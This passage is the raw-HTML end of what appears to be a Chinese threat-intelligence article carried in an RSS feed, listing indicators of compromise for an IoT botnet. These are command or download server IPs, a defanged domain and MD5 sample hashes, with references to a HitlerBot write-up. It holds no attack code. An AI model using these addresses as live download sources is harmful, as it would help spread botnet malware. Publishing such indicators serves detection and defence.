Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;">172.235.116.163</span></p><p style="margin-bottom: 8px;line-height: 1.6em;margin-top: 8px;"><span leaf="" style="font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-variant-position: normal;letter-spacing: 0.578px;text-indent: 37.3333px;color: rgb(0, 0, 0);font-size: 15px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;">185.232.84.168</span></p><p style="margin-bottom: 8px;line-height: 1.6em;margin-top: 8px;"><span leaf="" style="font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-variant-position: normal;letter-spacing: 0.578px;text-indent: 37.3333px;color: rgb(0, 0, 0);font-size: 15px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;">192.206.117.82</span></p><p><span leaf=""><span textstyle="" style="font-weight: bold;">下载服务器：</span></span></p><p style="margin-bottom: 8px;line-height: 1.6em;margin-top: 8px;"><span leaf="" style="font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-variant-position: normal;letter-spacing: 0.578px;text-indent: 37.3333px;color: rgb(0, 0, 0);font-size: 15px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;">158.94.209.216</span></p><p style="margin-bottom: 8px;line-height: 1.6em;margin-top: 8px;"><span leaf="" style="font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-variant-position: normal;letter-spacing: 0.578px;text-indent: 37.3333px;color: rgb(0, 0, 0);font-size: 15px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;">n7[.]gay</span></p><p style="margin-bottom: 8px;line-height: 1.6em;margin-top: 8px;"><span leaf="" style="font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-variant-position: normal;letter-spacing: 0.578px;text-indent: 37.3333px;color: rgb(0, 0, 0);font-size: 15px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;">45.144.174.2</span></p><p style="margin-bottom: 8px;line-height: 1.6em;margin-top: 8px;"><span leaf="" style="font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-variant-position: normal;letter-spacing: 0.578px;text-indent: 37.3333px;color: rgb(0, 0, 0);font-size: 15px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;">160.250.134.61</span></p><p style="margin-bottom: 8px;line-height: 1.6em;margin-top: 8px;"><span leaf="" style="font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-variant-position: normal;letter-spacing: 0.578px;text-indent: 37.3333px;color: rgb(0, 0, 0);font-size: 15px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;">42.112.26.45</span></p><p style="margin-bottom: 8px;line-height: 1.6em;margin-top: 8px;"><span style="font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-variant-position: normal;letter-spacing: 0.578px;text-indent: 37.3333px;color: rgb(0, 0, 0);font-size: 15px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span style="color: rgb(0, 0, 0);font-size: 15px;letter-spacing: 0.578px;text-indent: 37.3333px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf=""><span textstyle="" style="font-weight: bold;">MD5</span></span></span></span></p><p style="margin-bottom: 8px;line-height: 1.6em;margin-top: 8px;"><span leaf="" style="font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-variant-position: normal;letter-spacing: 0.578px;text-indent: 37.3333px;color: rgb(0, 0, 0);font-size: 15px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;">3b578e86eb9f18eb9ef0a14336ab42e8</span></p><p style="margin-bottom: 8px;line-height: 1.6em;margin-top: 8px;"><span leaf="" style="font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-variant-position: normal;letter-spacing: 0.578px;text-indent: 37.3333px;color: rgb(0, 0, 0);font-size: 15px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;">39c820dac2b7817c82a29fa8307c1cf6</span></p><p style="margin-bottom: 8px;line-height: 1.6em;margin-top: 8px;"><span leaf="" style="font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-variant-position: normal;letter-spacing: 0.578px;text-indent: 37.3333px;color: rgb(0, 0, 0);font-size: 15px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;">443dd3c715772fe6fca3d3580ab7dce1</span></p><p style="margin-bottom: 8px;line-height: 1.6em;margin-top: 8px;"><span leaf="" style="font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-variant-position: normal;letter-spacing: 0.578px;text-indent: 37.3333px;color: rgb(0, 0, 0);font-size: 15px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;">aa47ec2d48a0f507e16bb3c1c2b0770b</span></p><p style="margin-bottom: 8px;line-height: 1.6em;margin-top: 8px;"><span leaf="" style="font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-variant-position: normal;letter-spacing: 0.578px;text-indent: 37.3333px;color: rgb(0, 0, 0);font-size: 15px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;">f58645bd794dd6b8485a0577aa4cd21f</span></p><p style="margin-bottom: 8px;line-height: 1.6em;margin-top: 8px;"><span leaf="" style="font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-variant-position: normal;letter-spacing: 0.578px;text-indent: 37.3333px;color: rgb(0, 0, 0);font-size: 15px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;">8d62a96a313745bebd11e54b85190070</span></p><p style="margin-bottom: 8px;line-height: 1.6em;margin-top: 8px;"><span leaf="" style="font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-variant-position: normal;letter-spacing: 0.578px;text-indent: 37.3333px;color: rgb(0, 0, 0);font-size: 15px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;">57d64dadc689a04e6b2b3037e8778352</span></p><p style="margin-bottom: 8px;line-height: 1.6em;margin-top: 8px;"><span leaf="" style="font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-variant-position: normal;letter-spacing: 0.578px;text-indent: 37.3333px;color: rgb(0, 0, 0);font-size: 15px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;">813be16c993549698b04aa430ef3f37c</span></p><p style="margin-bottom: 8px;line-height: 1.6em;margin-top: 8px;"><span leaf="" style="font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-variant-position: normal;letter-spacing: 0.578px;text-indent: 37.3333px;color: rgb(0, 0, 0);font-size: 15px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;">a708af774ad9afa77dd9e014bde67348</span></p><p style="margin-bottom: 8px;line-height: 1.6em;margin-top: 8px;"><span leaf="" style="font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-variant-position: normal;letter-spacing: 0.578px;text-indent: 37.3333px;color: rgb(0, 0, 0);font-size: 15px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;">5f0836883726a5171919a4389cf221ff</span></p><p style="margin-bottom: 8px;line-height: 1.6em;margin-top: 8px;"><span leaf="" style="font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-variant-position: normal;letter-spacing: 0.578px;text-indent: 37.3333px;color: rgb(0, 0, 0);font-size: 15px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;">e26e7e62e00e61bf98f043c338ad64ee</span></p><p style="margin-bottom: 8px;line-height: 1.6em;margin-top: 8px;"><span leaf="" style="font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-variant-position: normal;letter-spacing: 0.578px;text-indent: 37.3333px;color: rgb(0, 0, 0);font-size: 15px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;">0d3758e0a4b0e67c263057645531f69f</span></p><div data-role="outer" label="edit by 135editor"><div data-role="outer" label="Powered by 135editor.com"><div data-role="paragraph" style="margin-top: 24px;margin-bottom: 24px;" data-pm-slice="9 4 [&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;outer&#34;,&#34;label&#34;:&#34;edit by 135editor&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;outer&#34;,&#34;label&#34;:&#34;Powered by 135editor.com&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;outer&#34;,&#34;label&#34;:&#34;Powered by 135editor.com&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;outer&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;paragraph&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;outer&#34;,&#34;label&#34;:&#34;edit by 135editor&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]"><div data-role="outer" label="edit by 135editor"><div data-role="title" data-tools="135编辑器" data-id="85638"><div style="margin-top: 2em;margin-right: auto;margin-left: auto;padding-top: 0.5em;padding-bottom: 0.5em;border-right: none;border-bottom: none;border-left: none;border-top: 1px solid rgb(204, 204, 204);font-size: 1em;font-weight: inherit;text-decoration: inherit;color: rgb(166, 166, 166);font-family: inherit;"><p style="margin-top: -1.2em;text-align: center;border-width: initial;border-style: none;border-color: initial;line-height: 1.4;"><span style="font-size: 16px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><strong><span style="font-size: 16px;background-color: rgb(15, 15, 25);border-color: rgb(183, 184, 184);color: rgb(255, 255, 255);padding: 8px 23px;text-decoration: inherit;"><span leaf="">参考</span></span></strong></span></p></div></div></div><p><span style="font-size: 15px;font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-variant-position: normal;text-indent: -21pt;letter-spacing: 0.034em;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf="">[1]<a class="normal_text_link" target="_blank" style="" href="https://mp.weixin.qq.com/s?__biz=MzA3NDQ0MzkzMA==&amp;mid=2651727078&amp;idx=1&amp;sn=6354630ff9624bda50a9c05e3dd9ed8a&amp;scene=21#wechat_redirect" textvalue="种族主义底色：新生物联网僵尸网络HitlerBot揭秘" data-itemshowtype="0" linktype="text" data-linktype="2">种族主义底色：新生物联网僵尸网络HitlerBot揭秘</a></span></span></p><p><span style="font-size: 15px;font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-variant-position: normal;text-indent: -21pt;letter-spacing: 0.034em;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf=""><span textstyle="" style="font-size: 15px;">[2] </span></span></span><span leaf=""><span textstyle="" style="font-size: 15px;"><a href="https://www.namecheap.com/domains/handshake-domains/" target="_blank">https://www.namecheap.com/domains/handshake-domains/</a></span></span></p></div></div></div></div></div></div></div></div></div></div></div><p style="display: none;"><mp-style-type data-value="3"></mp-style-type></p>


<p><a href="2247507522">阅读原文</a></p>
<p><a href="https://wechat2rss.xlab.app/link-proxy/?k=5394bd40&amp;r=1&amp;u=https%3A%2F%2Fmp.weixin.qq.com%2Fs%3F__biz%3DMzUyMjk4NzExMA%3D%3D%26mid%3D2247507522%26idx%3D1%26sn%3D7652b4d3d658e731ba5892ff93d13878">跳转微信打开</a></p>
]]></content:encoded>
      <pubDate>Mon, 17 Nov 2025 17:50:00 +0800</pubDate>
    </item>
  </channel>
</rss>